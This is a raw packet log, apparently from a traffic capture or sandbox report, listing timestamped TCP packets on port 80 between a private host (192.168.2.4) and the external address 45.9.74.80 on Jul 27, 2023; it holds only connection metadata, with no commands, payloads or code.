Jul 27, 2023 20:19:00.227711916 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.227725029 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.227755070 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.227766991 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.227796078 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.227824926 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.227853060 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.227890015 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.227919102 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.229705095 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.229737043 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.229788065 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.229850054 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.239778042 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.239864111 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.239907026 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.239948034 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.240017891 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.240056038 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.243149042 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.243191957 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.243232012 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.243299007 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.243334055 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.243551016 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.243591070 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.243696928 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.243758917 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.243810892 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.243849039 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.243868113 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.244215012 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.244254112 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.244319916 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.244354010 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.244407892 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.244659901 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.244846106 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.245146990 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.245207071 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.245253086 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.245300055 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.245311022 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.245409966 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.245614052 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.245652914 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.245671034 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.245707035 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.245724916 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.245820999 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.245908976 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.245923042 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.246032953 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.246160030 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.246211052 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.246227980 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.246274948 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.246483088 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.246521950 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.246637106 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.246696949 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.246838093 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.246876001 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.246892929 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.246918917 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.246998072 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.247042894 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.247155905 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.247210979 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.247668028 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.247766018 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.248284101 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.248461008 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.248486996 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.248514891 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.248691082 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.248691082 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.248723030 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.248748064 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.248770952 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.248845100 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.248869896 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.248893976 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.248919964 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.249100924 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.249377012 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.249402046 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.249495983 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.249495983 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.249567986 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.249758959 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.249825954 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.249867916 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.250009060 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.250029087 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.250102997 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.250153065 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.250170946 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.250189066 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.250210047 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.250230074 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.250286102 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.250286102 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.250353098 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.250982046 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.253103971 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.253133059 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.253160000 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.253189087 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.253220081 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.253242970 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.253261089 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.253279924 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.253298044 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.253315926 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.253339052 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.253367901 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.253376961 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.253396034 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.253415108 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.253441095 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.253451109 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.253468990 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.253487110 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.253494978 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.253513098 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.253525972 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.253539085 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.253556967 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.253576040 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.253593922 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.253601074 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.253619909 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.253628016 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.253663063 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.256031990 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.262407064 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.262438059 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.262463093 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.262536049 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.265456915 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.265484095 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.265507936 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.265557051 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.265594959 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.265990019 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.266015053 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.266094923 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.266124964 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.266139030 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.266163111 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.266175032 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.266196966 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.266341925 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.266386986 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.266395092 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.266422987 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.266429901 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.267370939 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.267396927 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.267421007 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.267451048 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.267491102 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.267904043 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.267941952 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.267982960 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.268003941 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.268049955 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.268083096 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.268107891 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.268121004 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.268168926 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.268615961 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.268650055 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.268682003 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.268712997 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.268743992 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.268759966 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.268774033 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.268805027 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.268836975 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.268850088 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.268897057 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.268929958 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.268975019 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.269870996 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.269906044 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.269963026 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.270045042 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.270092964 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.270108938 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.270153999 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.271683931 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.271775961 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.271809101 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.271842003 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.271872997 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.271909952 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.271920919 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.271955013 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.271965027 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.271996021 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.272036076 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.272061110 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.272083998 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.272115946 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.272136927 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.272161961 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.272176027 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.272206068 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.272350073 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.272382975 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.272403002 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.272425890 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.272440910 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.272473097 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.272530079 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.272563934 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.272593021 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.272625923 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.272654057 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.272686958 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.272716999 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.272749901 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.275719881 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.275754929 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.275785923 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.275820971 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.275863886 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.275896072 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.275913954 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.275938034 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.275969028 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.275998116 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.276030064 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.276062012 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.276093006 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.276124001 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.276139021 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.276151896 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.276181936 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.276212931 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.276243925 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.276257038 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.276325941 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.276357889 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.276372910 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.276395082 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.276415110 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.276448011 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.276479006 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.276515007 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.276531935 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.276557922 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.284682989 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.284723043 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.284904957 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.287636042 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.287686110 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.287739038 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.287811041 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.288217068 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.288285017 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.288300991 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.288347960 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.288383007 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.288418055 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.288433075 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.288470984 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.288512945 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.288558006 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.288602114 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.288645983 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.288666964 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.288711071 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.289541960 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.289589882 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.289635897 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.289710999 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.290079117 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.290147066 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.290162086 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.290209055 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.290361881 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.290405989 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.290429115 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.290467978 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.290494919 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.290540934 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.291209936 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.291261911 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.291284084 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.291301012 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.291342974 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.291387081 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.291429996 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.291469097 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.291496038 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.291532993 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.291559935 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.291604042 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.291964054 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.292030096 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.292046070 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.292072058 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.292113066 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.293965101 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.294017076 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.294064045 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.294092894 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.294117928 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.294504881 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.294554949 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.294600010 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.294646978 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.294670105 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.294708967 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.294811964 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.294857979 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.294903040 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.294950008 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.294969082 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.295025110 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.295109034 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.295154095 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.295200109 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.295245886 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.295264959 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.295304060 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.295329094 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.295373917 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.295419931 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.295460939 CEST	49693	80	192.168.2.4	45.9.74.80
